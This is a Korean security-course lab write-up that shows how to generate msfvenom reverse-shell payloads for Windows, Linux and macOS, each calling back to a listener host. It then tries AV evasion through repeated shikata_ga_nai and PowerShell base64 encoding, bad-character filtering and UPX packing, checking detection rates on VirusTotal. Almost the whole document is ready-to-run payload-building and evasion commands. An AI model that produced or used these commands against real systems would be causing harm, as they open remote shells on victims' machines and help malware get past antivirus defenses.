Post

시스템 보안 실습 3

페이로드

- msfvenom 이용

- virustotal로 탐지 검사

  • 생성한 페이로드 파일을 업로드해서 탐지되는지 확인

- 다양한 페이로드 생성 및 검사

  1. 윈도우PC를 공격하기 위한 페이로드 파일(exe) 작성
    • 명령어 : msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1111 -f msi -o msi_payload.msi
    • 탐지 결과
  2. 리눅스를 공격하기 위한 페이로드 파일(sh) 작성
    • 명령어 : msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=2222 -f elf -o sh_payload.elf
    • 탐지 결과
  3. 맥OS를 공격하기 위한 페이로드 파일 작성
    • 명령어 : msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=3333 -f macho -o macho_payload.macho
    • 탐지 결과

인코딩

- shikata_ga_nai

  • 명령어 : msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1111 -f exe -e x86/shikata_ga_nai -i 5 -o encode5.exe
  • 탐지 결과
    • 5번 수행
    • 20번 수행

- powershell_base64

  • 명령어 : msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1111 -f psh -e cmd/powershell_base64 -i 5 -o encode5.ps1
  • 탐지 결과

- Bad Characters 설정

  • 특정 문자열을 제외하고 페이로드 생성
  • 명령어 : msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1111 -f exe -e x86/shikata_ga_nai -i 20 -b ‘\x00\x0a\x0d’ -o b_ecnoded.exe
  • 탐지 결과

- 여러 인코딩 방법 결합

  • 탐지 결과

압축

- upx

  • 탐지 결과
    • 압축하기 전 위의 결과보다 탐지율이 조금 줄어든 것 확인 가능